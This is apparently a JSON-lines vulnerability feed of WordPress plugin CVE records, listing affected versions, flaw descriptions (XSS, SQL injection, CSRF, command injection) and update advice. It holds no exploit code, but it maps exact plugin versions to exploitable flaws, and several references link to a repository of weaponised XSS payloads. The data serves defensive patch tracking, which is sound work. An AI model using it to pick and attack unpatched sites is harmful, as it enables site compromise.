{"CVE_ID":"CVE-2024-13438","slug":"speedsize-ai-image-optimizer","versionImpact":"1.5.1","versionEndExcluding":"1.5.2","description":"The SpeedSize Image & Video AI-Optimizer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.1. This is due to missing or incorrect nonce validation on the 'speedsize_clear_css_cache_action' function. This makes it possible for unauthenticated attackers to clear the plugins cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3236368%40speedsize-ai-image-optimizer&new=3236368%40speedsize-ai-image-optimizer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3236368%40speedsize-ai-image-optimizer&new=3236368%40speedsize-ai-image-optimizer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1404c675-49b3-48a5-8aac-826c58755b8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1404c675-49b3-48a5-8aac-826c58755b8e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12682","slug":"smart-maintenance-mode","versionImpact":"1.5.1","versionEndExcluding":"1.5.2","description":"The Smart Maintenance Mode WordPress plugin before 1.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/79d0a139-0fb3-4a4b-ac33-80cbc6cb3831\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/79d0a139-0fb3-4a4b-ac33-80cbc6cb3831\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-49328","slug":"agile-store-locator","versionImpact":"1.5.1","versionEndExcluding":"1.5.2","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Agile Logix Store Locator WordPress allows SQL Injection. This issue affects Store Locator WordPress: from n\/a through 1.5.1.","recommendation":"Update to version 1.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/agile-store-locator\\\/vulnerability\\\/wordpress-store-locator-wordpress-1-5-1-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/agile-store-locator\\\/vulnerability\\\/wordpress-store-locator-wordpress-1-5-1-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12683","slug":"smart-maintenance-mode","versionImpact":"1.5.1","versionEndExcluding":"1.5.2","description":"The Smart Maintenance Mode WordPress plugin before 1.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1569ee00-56c3-4a1b-940e-e0256a748675\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1569ee00-56c3-4a1b-940e-e0256a748675\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0373","slug":"lightweight-accordion","versionEndExcluding":"1.5.15","description":"The Lightweight Accordion WordPress plugin before 1.5.15 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fe60ea83-b584-465a-8128-b7358d8da3af\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fe60ea83-b584-465a-8128-b7358d8da3af\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1663","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.142","versionEndExcluding":"1.5.143","description":"The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets in all versions up to, and including, 1.5.142 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.143, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3258648%40unlimited-elements-for-elementor&new=3258648%40unlimited-elements-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3258648%40unlimited-elements-for-elementor&new=3258648%40unlimited-elements-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d07c43e0-783a-499b-b172-d058583d0749?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d07c43e0-783a-499b-b172-d058583d0749?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36743","slug":"post-type-x","versionEndExcluding":"1.5.13","description":"The Product Catalog Simple plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.13. This is due to missing or incorrect nonce validation on the implecode_save_products_meta() function. This makes it possible for unauthenticated attackers to update product meta via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36e098fe-d1f9-4c8f-ae6b-222cbd5976b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36e098fe-d1f9-4c8f-ae6b-222cbd5976b2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368377\\\/post-type-x\\\/trunk\\\/core\\\/includes\\\/register-product.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368377\\\/post-type-x\\\/trunk\\\/core\\\/includes\\\/register-product.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10784","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.126","versionEndExcluding":"1.5.127","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018Tile Gallery' widget in all versions up to, and including, 1.5.126 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.127, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3185683%40unlimited-elements-for-elementor&new=3185683%40unlimited-elements-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3185683%40unlimited-elements-for-elementor&new=3185683%40unlimited-elements-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0149ae49-5d40-4431-9612-04182afce2ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0149ae49-5d40-4431-9612-04182afce2ec?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6171","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.112","versionEndExcluding":"1.5.113","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to IP Address Spoofing in all versions up to, and including, 1.5.112 due to insufficient IP address validation and\/or use of user-supplied HTTP headers as a primary method for IP retrieval. This makes it possible for unauthenticated attackers  to bypass antispam functionality in the Form Builder widgets.","recommendation":"Update to version 1.5.113, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/714acd7d-6d19-4087-bb27-b9a4ccbb678b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/714acd7d-6d19-4087-bb27-b9a4ccbb678b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_form.class.php#L742\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_form.class.php#L742\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/framework\\\/functions.class.php#L3407\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/framework\\\/functions.class.php#L3407\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112307\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112307\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6170","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.112","versionEndExcluding":"1.5.113","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018email\u2019 parameter in all versions up to, and including, 1.5.112 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.113, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db14b141-521b-464d-a638-2228b1a86c2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db14b141-521b-464d-a638-2228b1a86c2b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_settings_output.class.php#L398\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_settings_output.class.php#L398\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/hakluke\\\/weaponised-XSS-payloads\\\/blob\\\/master\\\/wordpress_create_admin_user.js\",\"name\":\"https:\\\/\\\/github.com\\\/hakluke\\\/weaponised-XSS-payloads\\\/blob\\\/master\\\/wordpress_create_admin_user.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112307\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112307\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6169","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.112","versionEndExcluding":"1.5.113","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018username\u2019 parameter in all versions up to, and including, 1.5.112 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above and granted plugin setting edit permissions by an administrator, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.113, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2f11c32-d58e-4ac8-83c7-30927a626e10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2f11c32-d58e-4ac8-83c7-30927a626e10?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/framework\\\/instagram\\\/helper.class.php#L168\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/framework\\\/instagram\\\/helper.class.php#L168\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/framework\\\/instagram\\\/helper.class.php#L178\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/framework\\\/instagram\\\/helper.class.php#L178\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/framework\\\/instagram\\\/helper.class.php#L182\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/framework\\\/instagram\\\/helper.class.php#L182\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/hakluke\\\/weaponised-XSS-payloads\\\/blob\\\/master\\\/wordpress_create_admin_user.js\",\"name\":\"https:\\\/\\\/github.com\\\/hakluke\\\/weaponised-XSS-payloads\\\/blob\\\/master\\\/wordpress_create_admin_user.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112307\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112307\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6166","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.112","versionEndExcluding":"1.5.113","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018addons_order\u2019 parameter in all versions up to, and including, 1.5.112 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above and granted plugin setting edit permissions by an administrator, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.5.113, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9826c91c-0f6e-4d3b-bc14-4af6b60ef246?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9826c91c-0f6e-4d3b-bc14-4af6b60ef246?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_addons.class.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_addons.class.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112307\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112307\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10638","slug":"aco-product-labels-for-woocommerce","versionImpact":"1.5.10","versionEndExcluding":"1.5.11","description":"The Product Labels For Woocommerce (Sale Badges) WordPress plugin before 1.5.11 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 1.5.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32a7a778-2211-45b4-bdc2-528f27b7d4fe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32a7a778-2211-45b4-bdc2-528f27b7d4fe\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32a7a778-2211-45b4-bdc2-528f27b7d4fe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32a7a778-2211-45b4-bdc2-528f27b7d4fe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13510","slug":"shopsite-plugin","versionImpact":"1.5.10","versionEndExcluding":"1.5.11","description":"The ShopSite plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.10. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.5.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3226553%40shopsite-plugin%2Ftrunk&old=3139879%40shopsite-plugin%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3226553%40shopsite-plugin%2Ftrunk&old=3139879%40shopsite-plugin%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2fde092-0a12-42ab-abbb-7f5ff5de9af2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2fde092-0a12-42ab-abbb-7f5ff5de9af2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4779","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.107","versionEndExcluding":"1.5.108","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to SQL Injection via the \u2018data[post_ids][0]\u2019 parameter in all versions up to, and including, 1.5.107 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.5.108, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b155f8ca-9d09-47d7-a7c2-7744df029c19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b155f8ca-9d09-47d7-a7c2-7744df029c19?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090199\\\/unlimited-elements-for-elementor\\\/trunk\\\/provider\\\/functions_wordpress.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090199\\\/unlimited-elements-for-elementor\\\/trunk\\\/provider\\\/functions_wordpress.class.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3190","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.107","versionEndExcluding":"1.5.108","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's text field widget in all versions up to, and including, 1.5.107 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Please note that this vulnerability is different in that the issue stems from an external template. It appears that older version may also be patched due to this, however, we are choosing 1.5.108 as the patched version since that is the most recent version containing as known patch.","recommendation":"Update to version 1.5.108, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78d8ddc9-69ad-4d69-ac23-5a31dfeafd54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78d8ddc9-69ad-4d69-ac23-5a31dfeafd54?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3090199%40unlimited-elements-for-elementor&new=3090199%40unlimited-elements-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3090199%40unlimited-elements-for-elementor&new=3090199%40unlimited-elements-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3055","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.102","versionEndExcluding":"1.5.105","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018id\u2019 parameter in all versions up to, and including, 1.5.102 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.5.105, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3081509%40unlimited-elements-for-elementor%2Ftrunk&old=3076456%40unlimited-elements-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3081509%40unlimited-elements-for-elementor%2Ftrunk&old=3076456%40unlimited-elements-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/tags\\\/1.5.93\\\/inc_php\\\/framework\\\/db.class.php#L238\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/tags\\\/1.5.93\\\/inc_php\\\/framework\\\/db.class.php#L238\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebc0c8e6-a365-4ef7-9c1a-41454855096c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebc0c8e6-a365-4ef7-9c1a-41454855096c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3547","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.102","versionEndExcluding":"1.5.103","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'google_connect_error' parameter in all versions up to, and including, 1.5.102 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.5.103, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071404\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_settings_output.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071404\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_settings_output.class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f629fc93-84ce-4c33-b1c0-3a3194aac477?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f629fc93-84ce-4c33-b1c0-3a3194aac477?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2662","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.102","versionEndExcluding":"1.5.103","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to command injection in all versions up to, and including, 1.5.102. This is due to insufficient filtering of template attributes during the creation of HTML for custom widgets This makes it possible for authenticated attackers, with administrator-level access and above, to execute arbitrary commands on the server.","recommendation":"Update to version 1.5.103, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071404\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_template_engine.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071404\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_template_engine.class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58492dbb-b9e0-4477-b85d-ace06dba954c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58492dbb-b9e0-4477-b85d-ace06dba954c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6210","slug":"duplicator","versionImpact":"1.5.9","versionEndExcluding":"1.5.10","description":"The Duplicator plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 1.5.9. This makes it possible for unauthenticated attackers to obtain the full path to instances, which they may be able to use in combination with other vulnerabilities or to simplify reconnaissance work. On its own, this information is of very limited use.","recommendation":"Update to version 1.5.10, or a newer patched 